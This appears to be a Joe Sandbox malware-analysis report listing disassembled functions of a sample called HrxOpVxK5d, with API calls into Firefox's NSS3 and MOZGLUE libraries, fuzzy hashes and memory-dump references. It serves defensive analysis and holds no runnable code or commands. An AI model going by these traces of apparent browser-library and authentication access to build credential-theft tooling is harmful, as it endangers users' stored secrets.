Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 3529033f8592cbf956793503b05464b3726aeab42d931cdefa08156636572ce0
Instruction ID: 0fdd3c96efb082842aaeae7dd59790f9d876f143ef347c7bc81098f321a7aacf
Opcode Fuzzy Hash: 3529033f8592cbf956793503b05464b3726aeab42d931cdefa08156636572ce0
Instruction Fuzzy Hash: 2811C4B59012019FFB20CF39D841B6A77B5AB4571DF84843EED098B382D771A805DBA2

Function 6D010570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CFFC89B,FFFFFE80,?,6CFFC89B), ref: 6D01058B
free.MOZGLUE(?,?,6CFFC89B), ref: 6D010592
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6CFFC89B), ref: 6D0105AE
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6CFFC89B), ref: 6D0105C2
DeleteCriticalSection.KERNEL32(6CFFC89B,?,6CFFC89B), ref: 6D0105D8
free.MOZGLUE(?,?,6CFFC89B), ref: 6D0105DF
PR_SetError.NSS3(FFFFE09A,00000000,?,6CFFC89B), ref: 6D0105FB

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Error$CriticalDeleteSectionfree$Value
String ID:
API String ID: 1757055810-0
Opcode ID: 16ffa2f4d99bab3ef22a4d24bd301b1060e4fab7b482f1027cc54f9f293dad04
Instruction ID: 3436e0a89ba7c0bb635e6eeb3d192a09fc21cead12229faa265226cd4037deba
Opcode Fuzzy Hash: 16ffa2f4d99bab3ef22a4d24bd301b1060e4fab7b482f1027cc54f9f293dad04
Instruction Fuzzy Hash: FE01477190D622ABFF349FF59C09B4E7B786B0AB19F440025E90653240DF70A12887AA

Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
CloseHandle.KERNEL32(000000FF), ref: 004194B7

Strings

>=A, xrefs: 00419488, 0041948B
>=A, xrefs: 004194A1, 004194CD, 004194A4

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=A$>=A
API String ID: 1378416451-3536956848
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85

Function 6CFEED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CFEED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CFEEDCE

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

free.MOZGLUE(00000000,?,?,?,?,6CFEB04F), ref: 6CFEEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CFEEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CFEEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CFEEEFB

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: be8c281ef001fc68ca884f9712df2f484adbf625ed6a3c94c0ee52699026b4c9
Instruction ID: b95098d1f76a65633865d6fc376b81d4a018a46f6827bf6caf0bc5b4e5a1742e
Opcode Fuzzy Hash: be8c281ef001fc68ca884f9712df2f484adbf625ed6a3c94c0ee52699026b4c9
Instruction Fuzzy Hash: 808158B5A00205AFEB14CF59E884BABBBF5BF8C308F154429E9159B751DB30E914CBE1

Function 6CFECCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CFEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CFEDAE2,?), ref: 6CFEC6C2

PR_Now.NSS3 ref: 6CFECD35

Part of subcall function 6D049DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DC6
Part of subcall function 6D049DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DD1
Part of subcall function 6D049DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D049DED

Part of subcall function 6CFD6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CF81C6F,00000000,00000004,?,?), ref: 6CFD6C3F

PR_GetCurrentThread.NSS3 ref: 6CFECD54

Part of subcall function 6D049BF0: TlsGetValue.KERNEL32(?,?,?,6D090A75), ref: 6D049C07

Part of subcall function 6CFD7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CF81CCC,00000000,00000000,?,?), ref: 6CFD729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFECD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CFECE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CFECE2C

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CFECE40

Part of subcall function 6CFE14C0: TlsGetValue.KERNEL32 ref: 6CFE14E0
Part of subcall function 6CFE14C0: EnterCriticalSection.KERNEL32 ref: 6CFE14F5
Part of subcall function 6CFE14C0: PR_Unlock.NSS3 ref: 6CFE150D

Part of subcall function 6CFECEE0: PORT_ArenaMark_Util.NSS3(?,6CFECD93,?), ref: 6CFECEEE
Part of subcall function 6CFECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CFECD93,?), ref: 6CFECEFC
Part of subcall function 6CFECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CFECD93,?), ref: 6CFECF0B
Part of subcall function 6CFECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CFECD93,?), ref: 6CFECF1D

Part of subcall function 6CFECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CFECD93,?), ref: 6CFECF47
Part of subcall function 6CFECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CFECD93,?), ref: 6CFECF67
Part of subcall function 6CFECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CFECD93,?,?,?,?,?,?,?,?,?,?,?,6CFECD93,?), ref: 6CFECF78

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 5b17d3cf12005c5b81e2740300a2ad53c714579f34b1a1e774beafeda6835338
Instruction ID: e1d8ecda947b92f8940f2b7193248defd9650874dc8a943924156eab2aa3c1be
Opcode Fuzzy Hash: 5b17d3cf12005c5b81e2740300a2ad53c714579f34b1a1e774beafeda6835338
Instruction Fuzzy Hash: 8A5181B6A00204AFEB10DF69DC40BEA7BE4AF4C348F254525E95997741EB31ED05CB91

Function 6CFBEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CFBEF38

Part of subcall function 6CFA9520: PK11_IsLoggedIn.NSS3(00000000,?,6CFD379E,?,00000001,?), ref: 6CFA9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CFBEF53

Part of subcall function 6CFC4C20: TlsGetValue.KERNEL32 ref: 6CFC4C4C
Part of subcall function 6CFC4C20: EnterCriticalSection.KERNEL32(?), ref: 6CFC4C60
Part of subcall function 6CFC4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4CA1
Part of subcall function 6CFC4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CFC4CBE
Part of subcall function 6CFC4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4CD2
Part of subcall function 6CFC4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4D3A

PR_GetCurrentThread.NSS3 ref: 6CFBEF9E

Part of subcall function 6D049BF0: TlsGetValue.KERNEL32(?,?,?,6D090A75), ref: 6D049C07

free.MOZGLUE(00000000), ref: 6CFBEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CFBF016
free.MOZGLUE(00000000), ref: 6CFBF022

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 253de3e99df4c759ae7bdfbb390b794a332c1f1630f1c746d9296361688a7131
Instruction ID: c96fc7c734b57e9210be8c1fd5f2fe36336f20fa20a578315a4fa2aa19110fe8
Opcode Fuzzy Hash: 253de3e99df4c759ae7bdfbb390b794a332c1f1630f1c746d9296361688a7131
Instruction Fuzzy Hash: F4416275E0020AAFDF018FA9DC85BEF7BB9AF48358F044025F914A7351EB72D9158BA1

Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004137D8

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

strtok_s.MSVCRT ref: 00413921

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 221e4de0ec5a2b1858c4eaa3da151c7506363e300f3ed1692d8e12e6559f7098
Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
Opcode Fuzzy Hash: 221e4de0ec5a2b1858c4eaa3da151c7506363e300f3ed1692d8e12e6559f7098
Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA

Function 6CF9E400 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CF9E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CF9E44F

Part of subcall function 6CFA2C40: TlsGetValue.KERNEL32(6CFA3F23,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C62
Part of subcall function 6CFA2C40: EnterCriticalSection.KERNEL32(0000001C,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C76
Part of subcall function 6CFA2C40: PL_HashTableLookup.NSS3(00000000,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C86
Part of subcall function 6CFA2C40: PR_Unlock.NSS3(00000000,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CF9E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CF9E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CF9E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CF9E52F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 233cb40820e86964495fe4be18b3671474acc6f4ea9e796d55676e5f19d77139
Instruction ID: 34ac46fb81dc0a8c482cea31a9c13000ad92a3e101d550fc24361b7d2ef7787d
Opcode Fuzzy Hash: 233cb40820e86964495fe4be18b3671474acc6f4ea9e796d55676e5f19d77139
Instruction Fuzzy Hash: 724104B5904A05CFEF00EF68D58456ABBF0BF09304B054969E985DB711EB30E895CBA2

Function 6CF965D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6CF9660F

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

free.MOZGLUE(00000000), ref: 6CF96660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CF9667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6CF9669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6CF966B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CF966C8

Part of subcall function 6CFC25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CF9662E,?,?), ref: 6CFC2670
Part of subcall function 6CFC25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CF9662E,?), ref: 6CFC2684
Part of subcall function 6CFC25D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CFC26C2
Part of subcall function 6CFC25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6CFC26E0
Part of subcall function 6CFC25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CFC26F4
Part of subcall function 6CFC25D0: PR_Unlock.NSS3(?), ref: 6CFC274D

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: 6b77a390797640ee6ee1fb0e0fecd863c5312e895d4825674d73ad09c396d827
Instruction ID: 115d6c3d36c7c9091640e0bfc0d17a15f9dbfff2cda9119ab60f6abe72c4b346
Opcode Fuzzy Hash: 6b77a390797640ee6ee1fb0e0fecd863c5312e895d4825674d73ad09c396d827
Instruction Fuzzy Hash: 1F3121B5E012199BEF41DFA8D881AAF77B5AF49358F150028ED15EB700EB31E904CBE1

Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B69A

Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6

DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7

Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138

DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99

Function 6CFE2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6CFE2576
PORT_Alloc_Util.NSS3(00000000), ref: 6CFE2585

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6CFE25A1
_waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6CFE25AF
free.MOZGLUE(00000000), ref: 6CFE25BB
free.MOZGLUE(00000000), ref: 6CFE25CA

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
